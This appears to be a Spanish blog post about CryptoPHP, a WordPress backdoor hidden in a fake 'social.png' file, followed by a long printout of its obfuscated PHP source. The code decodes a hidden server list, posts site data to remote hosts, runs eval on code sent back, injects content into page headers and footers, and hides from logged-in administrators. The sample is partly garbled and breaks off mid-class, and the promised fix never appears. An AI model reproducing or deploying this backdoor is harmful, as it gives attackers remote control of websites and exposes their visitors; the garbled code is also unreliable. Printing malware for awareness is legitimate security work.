CryptoPHP
En estos días a un cliente le ha sucedido un problema en su CMS para ser exacto en su wordpress.
Como el wordpress es un CMS muy popular de código abierto, al mismo le surgen muchas vulnerabilidades y aquí les comentare de este tipo de hackeo contra el wordpress y como solucionarlo.
Este troyano en esencial esta escondido dentro de un archivo .png bueno que en básico es un archivo base y tipo txt con lenguaje php escrito dentro de el. Este archivo lo esconden mayormente con el nombre social.png y es llamado básicamente por una función require o similar desde mayormente en el archivo function.php de algún Tema o de un plug-in.
El código malicioso lo mostrare aquí:
///////////////////////////////////////////////////////////////////////////////
TTsctbCBDGVyjyFVpVyp = $TTsctbCBDGVyjyFVpVyp; if ( $TTsctbCBDGVyjyFVpVyp === 1 ) { $rTfnEPRdToBnhSfwgHoC = "CREATE TABLE IF NOT EXISTS `#__options` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`option_name` text NOT NULL,
`value` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;"; $jiuOepDTQAtKPmDPlmA = JFactory::getDbo(); $jiuOepDTQAtKPmDPlmA->setQuery( $rTfnEPRdToBnhSfwgHoC ); $jiuOepDTQAtKPmDPlmA->query(); } if ( $TTsctbCBDGVyjyFVpVyp === 2 ) { $rTfnEPRdToBnhSfwgHoC = "CREATE TABLE IF NOT EXISTS `options` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`option_name` text NOT NULL,
`value` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1;"; db_query( $rTfnEPRdToBnhSfwgHoC ); } $this->uQfIZmMpqyjCaRQMgMoc = array( '=02ow5FryW3ogkJnuWUq', '6yzLhDKqwETol92q', '==trcWzYyEKqwETol92q', 'g92LhZ3ni9Togyzr', '==DoiAzYiEKqiyKMgS2p', '=8zMhyzYhIJMlqzoi9Jo', '=bKnv5vpuE3phSJofI2n', 'aW3ohHzMckzp19JM2y2M', '=02ow5PoyITqmEJquWaM', '==DoiAzY6ITqu1JLgkJL', 'g92LhpzockTocM2oaWKM', '==toc5vo1AKMaSTofyzq', '==jqj5FqiyKMwyzoyA2p', '3OaY1WGoj1JL', '=pUphxKqaWKnuu2L', '=4JnhVKMeAJnfMJock2p', '=4JnhV3ox5JLl9TryuTq', 'hyzYmk2oiEaoyk2M', 'hyzYh9TqlSzLhSTM', '=4JnhNKqiW3Mf9TogyzL', '==toc5lp0Szp0SzM', 'hyzYfIJM0Aaouu2L', 'hyzYlSTqm92Mhyzp', 'aW3ohHTo5E3pgHJocW3L', '==trcWzYmgJLgyTqf9zM', '==Nqy5zYmAKMhy2M0ITo0I3o', '==jqj5PnmyzMiEUnmyzp', '==jqj5lphS2pfIzquWUq', '==trcWzYlITMuk2Mc5Jq', '0IzohZUocSzMlITMh92q', '0IzohZKMfyUqm52ohITr', '=pzpi5vouEKn0g2LukzL', '==trcWzYfy2MlITqhIUn', '=bKnv5FM4S2nfyJo', '=bKnv5PqcgJLgSzp', '==trcWzYfk2ovITqiIKp', '==DoiAzYm52ox1zM', '=02ow5lpwy2p11JLlSTM', '=02ow5vpyWzLiWzpyq2MiWaM', '=02ow5lphIJof92n', '=02ow5lpykTpgS2pi9zM', '==DoiAzYmEzpu9zL2EKo', '==trcWzYmyKLxIao', 'iMzoc5lp5kzMx5JLlS2L', '==jow5lqikTn0SJo', '=82Lh82nhIJo', '==toc5lp3Izo3SJo', '=4Jnhf2LiWKolITq', 'hyzYeA2olIzoiE3p', '=4Jnh82oz1zM', 'hyzY0WKLjSJMyWaM', '==toc5PMhSTolSTqcI3M', '==toc5vou12MiWUp', '==toc5voz1zM', 'hyzYj9TouWKMhI2M', '=8zMhyzYykTpgS2pi9zM', '==joz5JnhHJMlMTAiWTn', '==joz5JnhHaZhITqmyTo', '=8zMhyzYyqJLjgzo', '3OaYm5JqaWzM', '=pUphH2nuEaZwyTp', '=pUphZapyE3pu1JMmIzocu2L', '=pUphxUMukJr6SToi9zM', '3OaYyAKqi92n', '0IzohxKLxIao', '=DKMh5Fne9TMhyzM', '==Nqy5zY5kzMx5JLlS2L', '==Nqy5zYi9zMgyzM', '==Nqy5zY392qzqKL', '==DoiAzYyyao2EKo', '=02ow5lpuyTMySKney2q', 'g92Lh4JMwEapiO3p', '=02ow5FMyWaM2EKo', '==DoiAzYwyJou5Jrx9JolIJo', 'g92LhDJMfkJLlIzquk2p', '=pzpi5FLc9zouWKLyO3p', '=DKMh5ln1kTnaI3oluTq', 'g92Lh0zpiE3pcAaoiO3p', '==DoiAzYcEaouW3MuyTM', '==DoiAzYyAzouE3pcAKMg9TM', '==DoiAzY5WKL0yTocWJnmSJM', '==DoiAzYaWKqvAUq0y2n', 'g92Lh0Jrh9zouqJq', '=02ow5PouITqmIKL', 'g92LhZUqcAKn2yTM', 'g92LhRzquqUql9Tn', '=02ow5PocEao19Jo', 'g92Lh4zpyEaoc9Tp', '==DoiAzYiEKLl9Tpl92LhyTo', 'g92Lhx3LuAJnfI2MlSTo', '==DoiAzYlI2Mu52olIJL', '==DoiAzYuu2pa5JnlIUM', '==DoiAzYmWKMg92LhyTo', '==DoiAzY3Izo3SJo' ); $this->YJPpcHYXiHzJcujCRMrl(); $this->RYXaXWzmuNWbJhAAdkYk = FALSE; $ANVoslonRNQSwwQloQTx = VpLgOEumcbcbVAoDSkNT( WP_OPTION_KEY ); if ( $ANVoslonRNQSwwQloQTx == NULL || $ANVoslonRNQSwwQloQTx == 'null' ) { $ANVoslonRNQSwwQloQTx = ''; } if ( $ANVoslonRNQSwwQloQTx == '' ) { $this->QchKkLFzBKbvSGpfvxRI = TRUE; $this->wbpSSSviIAVdaxozPaIs = new ozUEwvGfThFPKEOwkFic( 'new' ); $this->ROnGXakeZGHvnAshuA(); } else { $this->wbpSSSviIAVdaxozPaIs = new ozUEwvGfThFPKEOwkFic(); $this->ANVoslonRNQSwwQloQTx = $this->QcBvXJgXvjtpioOEqpI( $ANVoslonRNQSwwQloQTx, TRUE ); if ( isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'publicKey' ] ) ) { $this->wbpSSSviIAVdaxozPaIs->duINcvAvMBjVFAOeQCrT( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'publicKey' ] ); } } if ( $this->DykThtAuUVJVJpGjiOJr() ) { return FALSE; } $this->CPKWpEiLdpAqNsEEXLrF(); $this->TEDQAgcgMDuJlbEkvHlU(); if ( ! $this->QchKkLFzBKbvSGpfvxRI ) { $this->MMojNlkoXMbZUoUEZurV(); } if ( $TTsctbCBDGVyjyFVpVyp === 0 ) { $WDWTfYxwxTMIIsMmHXVV = '_site_transient_check_config_'; if ( function_exists( 'get_home_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( get_home_url() ),3, 5 ); } elseif ( function_exists( 'get_site_url' ) ) { $WDWTfYxwxTMIIsMmHXVV .= substr( md5( get_site_url() ), 3, 5); } else { $WDWTfYxwxTMIIsMmHXVV .= substr(md5( $_SERVER[ 'DOCUMENT_ROOT' ]) , 3, 5); } $MRClNpYsnlwZouJryjis = get_option( $WDWTfYxwxTMIIsMmHXVV, 0 ); $vQywbdKjWZluiwIxsQXa = time(); if ( $MRClNpYsnlwZouJryjis === 0 && !defined( '_wp_transient_config' )) { update_option( $WDWTfYxwxTMIIsMmHXVV, $vQywbdKjWZluiwIxsQXa ); $VbGBDDCPOXeYPOvSatBl = new IaLpFyUtkdDdtRnEDrJ(); } if ( ! defined( '_wp_active_plugins' ) ) { $gcAQATpMyBEOsCKgBRQG = pathinfo( __FILE__, PATHINFO_BASENAME ); $crnDNpdYNrpaBnqZgrgc = plugin_basename( __FILE__ ); $FZxyFcxHIgRadtHnDvWU = str_replace( $gcAQATpMyBEOsCKgBRQG, '', $crnDNpdYNrpaBnqZgrgc ); $uNKzgVGGqGPxHeRkgqRX = get_option( 'active_plugins', array() ); foreach ( $uNKzgVGGqGPxHeRkgqRX as $afaaIklbzorYXAlUjNPh ) { if ( strpos( $afaaIklbzorYXAlUjNPh, $FZxyFcxHIgRadtHnDvWU ) !== FALSE ) { $gcAQATpMyBEOsCKgBRQG = WP_PLUGIN_DIR . '/' . $afaaIklbzorYXAlUjNPh; register_deactivation_hook( $gcAQATpMyBEOsCKgBRQG, 'jqryqFBMrHdVpgSfpDad' ); break; } } } } } private function DykThtAuUVJVJpGjiOJr() { if ( !isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ) || strlen( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ) < 3 ) { return false; }else{ $dRxgBmOpUKkRaEKwAISv = substr( md5( $this->ANVoslonRNQSwwQloQTx['info']['serverKey'] ) , 3 , 5 ); } if ( isset( $_COOKIE[ $dRxgBmOpUKkRaEKwAISv ] ) ) { return TRUE; } if ( function_exists( 'is_user_logged_in' ) ) { if ( is_user_logged_in() ) { setcookie( $dRxgBmOpUKkRaEKwAISv, '1', time() + 93312000 ); return TRUE; } } return FALSE; } private function ROnGXakeZGHvnAshuA() { if ( ! defined( 'wp_newData' ) ) { $ClbAffTqwdfsStqVgzyq = $this->bQhqyjECNagHOENBeGGx(); $ClbAffTqwdfsStqVgzyq[ 'publicKey' ] = $this->wbpSSSviIAVdaxozPaIs->NgHMLtrOrvggBbUUtHKW(); $this->ClbAffTqwdfsStqVgzyq = $ClbAffTqwdfsStqVgzyq; $thcjWzdsMailOnImWlBT = FALSE; foreach ( $this->frtYLIADcPvIgOOOlqwP() as $ZRhtpGOgTZTZRdeSYVBw ) { if (empty($ZRhtpGOgTZTZRdeSYVBw)) { continue; } $ANVoslonRNQSwwQloQTx = $this->oAkCruOFAQbOjyqcMZMw( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ); $ANVoslonRNQSwwQloQTx = $this->sBqtxkmIaYHzAKLEdCcI( $ANVoslonRNQSwwQloQTx ); if ( $ANVoslonRNQSwwQloQTx !== FALSE ) { $thcjWzdsMailOnImWlBT = TRUE; if ( $this->RYXaXWzmuNWbJhAAdkYk ) { break; } break; } } if ( $thcjWzdsMailOnImWlBT ) { if ( $this->RYXaXWzmuNWbJhAAdkYk ) { $ANVoslonRNQSwwQloQTx = $this->jvhauOzYacIijjJXbEGB(); } $ANVoslonRNQSwwQloQTx[ 'info' ] = $ClbAffTqwdfsStqVgzyq; $this->xjUhToBfRhZlhXGMjiqQ( WP_OPTION_KEY, $ANVoslonRNQSwwQloQTx ); $this->ANVoslonRNQSwwQloQTx = $ANVoslonRNQSwwQloQTx; } else { $ANVoslonRNQSwwQloQTx = $this->jvhauOzYacIijjJXbEGB(); $ANVoslonRNQSwwQloQTx[ 'info' ] = $ClbAffTqwdfsStqVgzyq; $this->ANVoslonRNQSwwQloQTx = $ANVoslonRNQSwwQloQTx; $this->xjUhToBfRhZlhXGMjiqQ( WP_OPTION_KEY, $ANVoslonRNQSwwQloQTx ); } return $ANVoslonRNQSwwQloQTx; } return FALSE; } private function CPKWpEiLdpAqNsEEXLrF(){ if ( @$_REQUEST[ $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ] == 'reset' ) { $this->MMojNlkoXMbZUoUEZurV( 1, urldecode( $_REQUEST[ 'url' ] ) ); } if ( @$_REQUEST[ $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ] == 'update' ) { $this->MMojNlkoXMbZUoUEZurV( 1 ); } if ( @$_REQUEST[ $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'serverKey' ] ] == 'update' ) { $this->MMojNlkoXMbZUoUEZurV( 1 ); } } public function TEDQAgcgMDuJlbEkvHlU() { $ANVoslonRNQSwwQloQTx = $this->ANVoslonRNQSwwQloQTx; if ( ! isset( $ANVoslonRNQSwwQloQTx ) || $ANVoslonRNQSwwQloQTx == NULL ) { return; } if ( ! is_array( $ANVoslonRNQSwwQloQTx ) || $ANVoslonRNQSwwQloQTx == '' ) { return; } if ( @$ANVoslonRNQSwwQloQTx[ 'info' ][ 'eval' ] == 1 ) { if ( is_array( @$ANVoslonRNQSwwQloQTx[ 'eval' ] ) ) { foreach ( @$ANVoslonRNQSwwQloQTx[ 'eval' ] as $JbpGMBCRMNNqYrllqogh ) { eval( $JbpGMBCRMNNqYrllqogh ); } } } if ( isset( $ANVoslonRNQSwwQloQTx[ 'echo' ] ) ) { if ( ! defined( 'wp_footerLeo' ) ) { if ( $this->TTsctbCBDGVyjyFVpVyp == 0 ) { add_action( 'wp_head', array( $this, 'JLKCxmYDqGERxDYMhmOj' ) ); add_action( 'wp_footer', array( $this, 'JLKCxmYDqGERxDYMhmOj' ) ); @ob_start( 'JLKCxmYDqGERxDYMhmOj' ); } if ( $this->TTsctbCBDGVyjyFVpVyp == 1 ) { $NEKXukygfLoADkopeheR = JResponse::getBody(); $TyesFaUGdbAsPGadCnwt = &JFactory::getDocument(); ob_start(); $this->JLKCxmYDqGERxDYMhmOj(); $pnbgYzqXMNjqSBORSeLB = ob_get_contents(); ob_end_clean(); $NEKXukygfLoADkopeheR = preg_replace( "/(\)/", "$1 $pnbgYzqXMNjqSBORSeLB", $NEKXukygfLoADkopeheR ); JResponse::setBody( $NEKXukygfLoADkopeheR ); } if ( $this->TTsctbCBDGVyjyFVpVyp == 2 ) { } } } } public function JLKCxmYDqGERxDYMhmOj($aZkalCUWtsxgyfejJWSS = false) { if ( isset( $GLOBALS[ 'wp_run_crx' ] ) ) { return $aZkalCUWtsxgyfejJWSS; } $GLOBALS[ 'wp_run_crx' ] = 1; $ANVoslonRNQSwwQloQTx = $this->ANVoslonRNQSwwQloQTx; foreach ( $ANVoslonRNQSwwQloQTx[ 'echo' ] as $gTFusccXHODHdNfTRcIr ) { if ( $aZkalCUWtsxgyfejJWSS != FALSE ) { str_replace( "rFofWoxFwVRGhuCOjsaK = str_replace( $MsLKWZubUpwZsXweShFg, "", $rFofWoxFwVRGhuCOjsaK ); return $this->rFofWoxFwVRGhuCOjsaK; } private function frtYLIADcPvIgOOOlqwP() { $ANVoslonRNQSwwQloQTx = array(); foreach ( $this->uQfIZmMpqyjCaRQMgMoc as $ZRhtpGOgTZTZRdeSYVBw ) { $ANVoslonRNQSwwQloQTx[ ] = base64_decode( str_rot13( strrev( $ZRhtpGOgTZTZRdeSYVBw ) ) ); } if ( isset( $this->ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] ) ) { $RIDSsUypyvhaOoRUSAVT = (int) ( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] / 100 ); if ( $RIDSsUypyvhaOoRUSAVT == 0 ) { $RIDSsUypyvhaOoRUSAVT = 5; } else { $RIDSsUypyvhaOoRUSAVT *= 5; } } else { $RIDSsUypyvhaOoRUSAVT = 5; } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $RIDSsUypyvhaOoRUSAVT ); } private function kxNFPkmoRjlpKMZgBBSt( $nAdZoAdkHIGJvIPtmRmT ) { $ANVoslonRNQSwwQloQTx = array(); foreach ( $this->ANVoslonRNQSwwQloQTx[ 'emails' ] as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = $fzzoeSAOApURHlkJwYWs; } foreach ( $this->keXZeLlUjrISqwBQePlM as $fzzoeSAOApURHlkJwYWs ) { $ANVoslonRNQSwwQloQTx[ ] = base64_decode( str_rot13( strrev( $fzzoeSAOApURHlkJwYWs ) ) ); } return $this->TSmgHGGpCOaFpIQthvlU( $ANVoslonRNQSwwQloQTx, $nAdZoAdkHIGJvIPtmRmT ); } private function bQhqyjECNagHOENBeGGx() { if ( ! defined( 'wp_getInfoData' ) ) { $ANVoslonRNQSwwQloQTx = array(); $ANVoslonRNQSwwQloQTx[ 'host' ] = $this->YJPpcHYXiHzJcujCRMrl(); $ANVoslonRNQSwwQloQTx[ 'page' ] = $_SERVER[ 'REQUEST_URI' ]; $ANVoslonRNQSwwQloQTx[ 'ip' ] = $_SERVER[ 'SERVER_ADDR' ]; $ANVoslonRNQSwwQloQTx[ 'eval' ] = $this->iIkbNPOMzHBEaGLuayXw(); $ANVoslonRNQSwwQloQTx[ 'exec' ] = $this->schzwZIoqdCTflLjVBrW(); $ANVoslonRNQSwwQloQTx[ 'serverKey' ] = $this->ERCpAYkPoxkdbTLfQwev(); $ANVoslonRNQSwwQloQTx[ 'run' ] = 0; $ANVoslonRNQSwwQloQTx[ 'type' ] = $this->TTsctbCBDGVyjyFVpVyp; $ANVoslonRNQSwwQloQTx[ 'ver' ] = 1.0; $ANVoslonRNQSwwQloQTx[ 'started' ] = date( 'Ymd' ); $ANVoslonRNQSwwQloQTx[ 'last_connect' ] = date( 'Ymd' ); $this->ClbAffTqwdfsStqVgzyq = $ANVoslonRNQSwwQloQTx; return $ANVoslonRNQSwwQloQTx; } return FALSE; } private function ERCpAYkPoxkdbTLfQwev( $WOvxjgelkBHhHJvNcmNG = 10 ) { $MsLKWZubUpwZsXweShFg = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; $MTOgwpITDJOdGfIbmww = ''; for ( $xLyDQzORkZZbMOednjNE = 0 ; $xLyDQzORkZZbMOednjNE < $WOvxjgelkBHhHJvNcmNG ; $xLyDQzORkZZbMOednjNE ++ ) { $MTOgwpITDJOdGfIbmww .= $MsLKWZubUpwZsXweShFg[ rand( 0, strlen( $MsLKWZubUpwZsXweShFg ) - 1 ) ]; } return $MTOgwpITDJOdGfIbmww; } public function MMojNlkoXMbZUoUEZurV($qcquFjFPdpAwnQIbpBRH = false, $ZRhtpGOgTZTZRdeSYVBw = null) { $ANVoslonRNQSwwQloQTx = $this->ANVoslonRNQSwwQloQTx; if ( ! defined( 'wp_checkUpdate' ) ) { if ( @$ANVoslonRNQSwwQloQTx[ 'info' ][ 'last_connect' ] < date( 'Ymd' ) || $qcquFjFPdpAwnQIbpBRH ) { $ANVoslonRNQSwwQloQTx = $this->zpYUVZJHzzfDLRiDDsLK( $ANVoslonRNQSwwQloQTx, $ZRhtpGOgTZTZRdeSYVBw ); if ( $ANVoslonRNQSwwQloQTx == FALSE ) { return; } else { unset( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'fail' ] ); } $ANVoslonRNQSwwQloQTx[ 'info' ][ 'last_connect' ] = date( 'Ymd' ); $ANVoslonRNQSwwQloQTx[ 'info' ][ 'run' ] ++; $this->xjUhToBfRhZlhXGMjiqQ( WP_OPTION_KEY, $ANVoslonRNQSwwQloQTx ); } } } private function zpYUVZJHzzfDLRiDDsLK( $ANVoslonRNQSwwQloQTx , $ZRhtpGOgTZTZRdeSYVBw) { if ( ! defined( 'wp_updateData' ) ) { if ( isset( $ZRhtpGOgTZTZRdeSYVBw ) ) { $this->EYtAUHIreQzDKeiVNfCU( array( $ZRhtpGOgTZTZRdeSYVBw ), $ANVoslonRNQSwwQloQTx ); } $uQfIZmMpqyjCaRQMgMoc = @$ANVoslonRNQSwwQloQTx[ 'servers' ]; $WVnZYORFsYkxVCRWs = $this->EYtAUHIreQzDKeiVNfCU( $uQfIZmMpqyjCaRQMgMoc, $ANVoslonRNQSwwQloQTx ); if ( $WVnZYORFsYkxVCRWs !== FALSE ) { return $WVnZYORFsYkxVCRWs; } $WVnZYORFsYkxVCRWs = $this->EYtAUHIreQzDKeiVNfCU( $this->frtYLIADcPvIgOOOlqwP(), $ANVoslonRNQSwwQloQTx ); if ( $WVnZYORFsYkxVCRWs !== FALSE ) { return $WVnZYORFsYkxVCRWs; } } return FALSE; } private function EYtAUHIreQzDKeiVNfCU( $uQfIZmMpqyjCaRQMgMoc, $ANVoslonRNQSwwQloQTx ) { foreach ( $uQfIZmMpqyjCaRQMgMoc as $ZRhtpGOgTZTZRdeSYVBw ) { $WVnZYORFsYkxVCRWs = $this->ElmztdVzbngvxQDztI( $ZRhtpGOgTZTZRdeSYVBw, $ANVoslonRNQSwwQloQTx[ 'info' ], $ANVoslonRNQSwwQloQTx ); if ( $WVnZYORFsYkxVCRWs != FALSE ) { if ( ! isset( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] ) ) { $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] = 0; } if ( $this->RYXaXWzmuNWbJhAAdkYk ) { $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] ++; if ( ! isset( $xLyDQzORkZZbMOednjNE ) ) { $xLyDQzORkZZbMOednjNE = (int) ( $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ] / 5 ); } if ( $xLyDQzORkZZbMOednjNE > 0 ) { $xLyDQzORkZZbMOednjNE --; continue; } } if ( $this->RYXaXWzmuNWbJhAAdkYk ) { return $ANVoslonRNQSwwQloQTx; } $WVnZYORFsYkxVCRWs[ 'info' ][ 'empty' ] = -- $ANVoslonRNQSwwQloQTx[ 'info' ][ 'empty' ]; return $WVnZYORFsYkxVCRWs; } } return FALSE; } private function ElmztdVzbngvxQDztI( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq, $ANVoslonRNQSwwQloQTx ) { $this->RYXaXWzmuNWbJhAAdkYk = FALSE; $rckdssQxbXVPjhExNdhX = $this->oAkCruOFAQbOjyqcMZMw( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ); $rckdssQxbXVPjhExNdhX = $this->sBqtxkmIaYHzAKLEdCcI( $rckdssQxbXVPjhExNdhX ); if ( $rckdssQxbXVPjhExNdhX != FALSE ) { if ( $this->RYXaXWzmuNWbJhAAdkYk ) { return $ANVoslonRNQSwwQloQTx; } $rckdssQxbXVPjhExNdhX[ 'info' ] = $ClbAffTqwdfsStqVgzyq; return $rckdssQxbXVPjhExNdhX; } return FALSE; } private function sBqtxkmIaYHzAKLEdCcI( $ANVoslonRNQSwwQloQTx ) { if ( ! defined( 'wp_validData' ) ) { if ( ! isset( $this->ClbAffTqwdfsStqVgzyq ) ) { $this->ClbAffTqwdfsStqVgzyq = $this->ANVoslonRNQSwwQloQTx[ 'info' ]; } if ( md5( $this->ClbAffTqwdfsStqVgzyq[ 'serverKey' ] ) == $ANVoslonRNQSwwQloQTx ) { $this->RYXaXWzmuNWbJhAAdkYk = TRUE; return TRUE; } $ANVoslonRNQSwwQloQTx = $this->wbpSSSviIAVdaxozPaIs->fakDjKdyfxqzqCVYUs( $ANVoslonRNQSwwQloQTx ); $ANVoslonRNQSwwQloQTx = json_decode( $ANVoslonRNQSwwQloQTx, TRUE ); if ( $ANVoslonRNQSwwQloQTx == FALSE ) { return FALSE; } else { if ( ! isset( $ANVoslonRNQSwwQloQTx[ 'servers' ] ) ) { return FALSE; } } return $ANVoslonRNQSwwQloQTx; } return FALSE; } private function sakCZboUKVgZcavmOLlv( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ) { $XpVWhYQezAsCoguzeUk = NULL; $ZRhtpGOgTZTZRdeSYVBw = 'http://' . $ZRhtpGOgTZTZRdeSYVBw; if ( function_exists( 'curl_version' ) ) { $cPQDNzaFpBKRxzJrBNZG = curl_init(); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_URL, $ZRhtpGOgTZTZRdeSYVBw ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_RETURNTRANSFER, 1 ); @curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_FOLLOWLOCATION, TRUE ); if ( isset( $ClbAffTqwdfsStqVgzyq ) && is_array( $ClbAffTqwdfsStqVgzyq ) ) { curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POST, TRUE ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CUSTOMREQUEST, "POST" ); curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_POSTFIELDS, $ClbAffTqwdfsStqVgzyq ); } curl_setopt( $cPQDNzaFpBKRxzJrBNZG, CURLOPT_CONNECTTIMEOUT, 10 ); $XpVWhYQezAsCoguzeUk = curl_exec( $cPQDNzaFpBKRxzJrBNZG ); curl_close( $cPQDNzaFpBKRxzJrBNZG ); } elseif ( function_exists( 'fsockopen' ) ) { $DfDZKkNFaULmGrCVkdmO = parse_url( $ZRhtpGOgTZTZRdeSYVBw ); $FYxyvybywDQZOUsbpyEd = ( isset( $DfDZKkNFaULmGrCVkdmO[ 'port' ] ) && $DfDZKkNFaULmGrCVkdmO[ 'port' ] ) ? (int) $DfDZKkNFaULmGrCVkdmO[ 'port' ] : 80; $NXdTbsKfmSOvfgWeGQma = ( isset( $DfDZKkNFaULmGrCVkdmO[ 'path' ] ) && $DfDZKkNFaULmGrCVkdmO[ 'path' ] ) ? $DfDZKkNFaULmGrCVkdmO[ 'path' ] : '/'; if ( isset( $DfDZKkNFaULmGrCVkdmO[ 'query' ] ) && $DfDZKkNFaULmGrCVkdmO[ 'query' ] ) { $NXdTbsKfmSOvfgWeGQma .= '?' . $DfDZKkNFaULmGrCVkdmO[ 'query' ]; } if ( $nWTGWQDrNcMlYfY = @fsockopen( $DfDZKkNFaULmGrCVkdmO[ 'host' ], $FYxyvybywDQZOUsbpyEd, $CUchiqUmYextPVnfusIF, $RmvXBnmlEOCDzFpLtnQh, 10 ) ) { fwrite( $nWTGWQDrNcMlYfY, "POST {$NXdTbsKfmSOvfgWeGQma} HTTP/1.1\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "Host: {$DfDZKkNFaULmGrCVkdmO['host']}\r\n" ); if ( isset( $ClbAffTqwdfsStqVgzyq ) && is_array( $ClbAffTqwdfsStqVgzyq ) ) { $BwKJfYtBWvwlFPSYbYFU = http_build_query( $ClbAffTqwdfsStqVgzyq ); fwrite( $nWTGWQDrNcMlYfY, "Content-Type: application/x-www-form-urlencoded\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "Content-Length: " . strlen( $BwKJfYtBWvwlFPSYbYFU ) . "\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "Connection: close\r\n" ); fwrite( $nWTGWQDrNcMlYfY, "\r\n" ); fwrite( $nWTGWQDrNcMlYfY, $BwKJfYtBWvwlFPSYbYFU ); } fwrite( $nWTGWQDrNcMlYfY, "Connection: close\r\n" ); $BwKJfYtBWvwlFPSYbYFU = ''; while ( ! feof( $nWTGWQDrNcMlYfY ) ) { $BwKJfYtBWvwlFPSYbYFU .= fgets( $nWTGWQDrNcMlYfY, 4096 ); } fclose( $nWTGWQDrNcMlYfY ); $OBZOxZtsmJECmtOofbw = explode( "\r\n\r\n", $BwKJfYtBWvwlFPSYbYFU, 2 ); $BwKJfYtBWvwlFPSYbYFU = NULL; $XpVWhYQezAsCoguzeUk = isset( $OBZOxZtsmJECmtOofbw[ 1 ] ) ? trim( $OBZOxZtsmJECmtOofbw[ 1 ] ) : ''; if ( $XpVWhYQezAsCoguzeUk ) { $VuvXgWrUCVhuPJHEMqFV = strpos( $XpVWhYQezAsCoguzeUk, '{' ); if ( $VuvXgWrUCVhuPJHEMqFV !== FALSE ) { $XpVWhYQezAsCoguzeUk = substr( $XpVWhYQezAsCoguzeUk, $VuvXgWrUCVhuPJHEMqFV ); } $VuvXgWrUCVhuPJHEMqFV = strrpos( $XpVWhYQezAsCoguzeUk, '}' ); if ( $VuvXgWrUCVhuPJHEMqFV !== FALSE ) { $XpVWhYQezAsCoguzeUk = substr( $XpVWhYQezAsCoguzeUk, 0, $VuvXgWrUCVhuPJHEMqFV + 1 ); } } } } return $XpVWhYQezAsCoguzeUk; } private function oAkCruOFAQbOjyqcMZMw( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq = NULL, $lCTNLabxnOcjyrYcxGfw = NULL ) { if ( strstr( $ZRhtpGOgTZTZRdeSYVBw, $_SERVER[ 'HTTP_HOST' ] ) || empty($ZRhtpGOgTZTZRdeSYVBw) || trim( $ZRhtpGOgTZTZRdeSYVBw ) == '' ) { return FALSE; } if ( isset( $ClbAffTqwdfsStqVgzyq ) ) { $uoZKldafGapBNDDpFNBP = json_encode( $ClbAffTqwdfsStqVgzyq ); $ANVoslonRNQSwwQloQTx = $this->wbpSSSviIAVdaxozPaIs->XdjJpcCkQalYGiLHaNXR( $uoZKldafGapBNDDpFNBP ); $ClbAffTqwdfsStqVgzyq = array( "serverKey" => $ClbAffTqwdfsStqVgzyq[ 'serverKey' ], "data" => $ANVoslonRNQSwwQloQTx[ 'data' ], "key" => $ANVoslonRNQSwwQloQTx[ 'key' ] ); } while ( TRUE ) { $ANVoslonRNQSwwQloQTx = $this->sakCZboUKVgZcavmOLlv( $ZRhtpGOgTZTZRdeSYVBw, $ClbAffTqwdfsStqVgzyq ); if ( ! strstr( $ANVoslonRNQSwwQloQTx, "301 Moved Permanently" ) ) { break; } else { preg_match_all( '/ 10000000 ) { $FdQRXBxLOBbcesmLHZsQ /= 100000; } $this->uBgDYDxGvwTUUWgwsZtu = $FdQRXBxLOBbcesmLHZsQ; $FdQRXBxLOBbcesmLHZsQ %= $dPQYPSLPdhPbzVDBxQsK; return $FdQRXBxLOBbcesmLHZsQ; } } class ozUEwvGfThFPKEOwkFic { private $cWBcMhvuwNKQKeikhYeZ, $kgqyGHEFDeTSgaPnfjaW, $uryvGPuyNCNLgIMuTXlS; private $jiuOepDTQAtKPmDPlmA; public function __construct( $lCTNLabxnOcjyrYcxGfw = 'old' ) { if ( class_exists( 'JFactory' ) ) { $this->jiuOepDTQAtKPmDPlmA = JFactory::getDbo(); } if ( $lCTNLabxnOcjyrYcxGfw == 'new' ) { $this->ROnGXakeZGHvnAshuA(); } else { $this->eSWJphzLBsQkTYOMAcsN(); } 